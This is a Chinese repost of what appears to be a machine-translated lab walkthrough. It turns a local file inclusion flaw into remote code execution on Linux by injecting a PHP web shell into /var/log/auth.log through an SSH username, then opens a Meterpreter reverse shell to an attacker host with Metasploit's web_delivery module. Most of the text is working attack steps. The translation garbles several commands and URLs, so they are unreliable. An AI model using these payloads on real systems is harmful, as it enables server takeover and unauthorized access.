在Linux下出现文件包含漏洞的另类拿SHELL方法

admin 2018年5月8日01:08:17评论432 views字数 1546阅读5分9秒阅读模式
摘要

创建一个PHP文件,允许用户通过文件参数包含文件。因此,使用文件参数,我们可以执行一个包含恶意代码的文件,使未经授权的访问是目标PC。从这里下载文件
我就用下方的文本文件里的PHP代码给出 lfi.php 并保存在桌面上。

 攻击者:Kali Linux 目标:Ubuntu 

创建一个PHP文件,允许用户通过文件参数包含文件。因此,使用文件参数,我们可以执行一个包含恶意代码的文件,使未经授权的访问是目标PC。从这里下载文件
我就用下方的文本文件里的PHP代码给出 lfi.php 并保存在桌面上。

在Linux下出现文件包含漏洞的另类拿SHELL方法

现在用户以“root”身份登录,并在/var/www/html内创建一个文件夹“lfi”

cd/var/www/html

mkdir lfi

使用下面的命令将lfi.php 文件从桌面移动 到/ var / www / html。

mv /home/raj/Desktop/lfi.php

在Linux下出现文件包含漏洞的另类拿SHELL方法

由于我们已经在/ var / www / html中添加了一个包含include函数的php文件,允许通过它读取另一个文件的内容,并且可能导致LFI攻击。让我们通过构造URL来读取密码文件:

本地主机/LFI/lfi.php?文件=/etc/passwd文件

从给定的图像,你可以观察到上面的URL已经读取到下面的结果如下所示。

在Linux下出现文件包含漏洞的另类拿SHELL方法

在您的kali Linux中打开终端并 通过SSH服务连接目标

ssh [email protected]

从截图中可以看到我与目标系统连接。

在Linux下出现文件包含漏洞的另类拿SHELL方法

键入以下命令查看其日志:

tail -f /var/log/auth.log

从下面的图片你可以检查auth.log文件的生成日志的详细信息。

在Linux下出现文件包含漏洞的另类拿SHELL方法

现在我将尝试在浏览器上通过lfi.php打开auth.log日志文件,因此授予对auth.log的读写权限。

cd/var/log/

chmod 775 auth.log

在Linux下出现文件包含漏洞的另类拿SHELL方法

现在将auth.log文件包含为文件参数,并在浏览器内提供以下URL。

192.168.1.129/lfi/lfi.php?file=/var/log/auth.log

从给定的图像,你可以看到它也显示在浏览器中创建的身份验证日志。

在Linux下出现文件包含漏洞的另类拿SHELL方法

由于auth.log文件会在我们尝试连接到Web服务器时为每次成功都生成日志,并失败登录尝试。现在利用这个功能,我会发送恶意PHP代码 作为假用户,它会自动添加到auth.log文件作为新的日志。

 ssh  ' <?php system($ _ GET ['c']); ?>'@ 192.168.1.129 

在Linux下出现文件包含漏洞的另类拿SHELL方法

当你再次检查它的日志时,你会发现PHP代码已经被添加为新的日志。

键入以下命令查看其日志:

tail -f /var/log/auth.log

在Linux下出现文件包含漏洞的另类拿SHELL方法

这里它将转储auth日志的数据以及执行通过cmd给出的注释; 现在执行 ifconfig 作为cmd注释来验证网络接口,并在给定的屏幕截图中确认其结果。

192.168.1.129/lfi/lfi.php?file=/var/log/auth.log&c=ifconfig

在Linux下出现文件包含漏洞的另类拿SHELL方法

如果您在任何Web应用程序中发现此类漏洞,则可以使用metasploit平台来利用Web服务器。

 use exploit/multi/script/web_delivery msf exploit (web_delivery)>set target 1 msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp msf exploit (web_delivery)> set lhost 192.168.1.123 msf exploit (web_delivery)>set srvport  8081 msf exploit (web_delivery)>exploit 

复制 下面窗口中显示 的 高亮文本

在Linux下出现文件包含漏洞的另类拿SHELL方法

将上面 复制的恶意代码粘贴到 URL中,如图所示,并将 其 作为命令执行。

在Linux下出现文件包含漏洞的另类拿SHELL方法

当上面的代码得到执行时,您将获得目标Web服务器的meterpreter会话1。

 msf exploit (web_delivery)>sessions 1 meterpreter> sysinfo 

在Linux下出现文件包含漏洞的另类拿SHELL方法

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2018年5月8日01:08:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   在Linux下出现文件包含漏洞的另类拿SHELL方法http://cn-sec.com/archives/50824.html

发表评论

匿名网友 填写信息